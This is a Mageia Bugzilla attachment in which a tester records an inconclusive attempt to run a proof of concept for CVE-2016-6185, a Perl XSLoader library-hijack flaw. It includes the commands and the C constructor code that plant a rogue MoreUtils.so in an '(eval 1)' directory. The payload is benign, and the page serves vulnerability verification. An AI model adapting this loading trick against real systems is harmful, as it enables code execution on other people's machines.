Mageia Bugzilla – Attachment 8340 Details for
Bug 18894
perl, perl-XSLoader new security issue CVE-2016-6185
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
Log In
[x]
|
New Account
|
Forgot Password
Inconclusive attempt to run a PoC
report (text/plain), 680 bytes, created by
Len Lawrence
on 2016-08-12 20:11:04 CEST
(
hide
)
Description:
Inconclusive attempt to run a PoC
Filename:
MIME Type:
Creator:
Len Lawrence
Created:
2016-08-12 20:11:04 CEST
Size:
680 bytes
patch
obsolete
>PoC at https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=829578 > >$ mkdir -p '(eval 1)/auto/List/MoreUtils/' >$ gcc -Wall -fPIC -shared moo.c -o '(eval 1)/auto/List/MoreUtils/MoreUtils.so' >$ perl -e 'no lib "."; use List::MoreUtils' > (__) > (oo) > /------\/ > / | || > * /\---/\ > ~~ ~~ >..."Have you mooed today?"... >Segmentation fault > >$ locate auto/List/MoreUtils/MoreUtils.so >/usr/lib/perl5/vendor_perl/5.20.1/x86_64-linux-thread-multi/auto/List/MoreUtils/MoreUtils.so > >moo.c contains: >#include <signal.h> >#include <stdlib.h> >void __attribute__((constructor)) moo() { > system("apt-get moo"); > kill(0, SIGSEGV); >} >
PoC at https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=829578 $ mkdir -p '(eval 1)/auto/List/MoreUtils/' $ gcc -Wall -fPIC -shared moo.c -o '(eval 1)/auto/List/MoreUtils/MoreUtils.so' $ perl -e 'no lib "."; use List::MoreUtils' (__) (oo) /------\/ / | || * /\---/\ ~~ ~~ ..."Have you mooed today?"... Segmentation fault $ locate auto/List/MoreUtils/MoreUtils.so /usr/lib/perl5/vendor_perl/5.20.1/x86_64-linux-thread-multi/auto/List/MoreUtils/MoreUtils.so moo.c contains: #include <signal.h> #include <stdlib.h> void __attribute__((constructor)) moo() { system("apt-get moo"); kill(0, SIGSEGV); }
View Attachment As Raw
Actions:
View
Attachments on
bug 18894
:
8339
|
8340
|
8341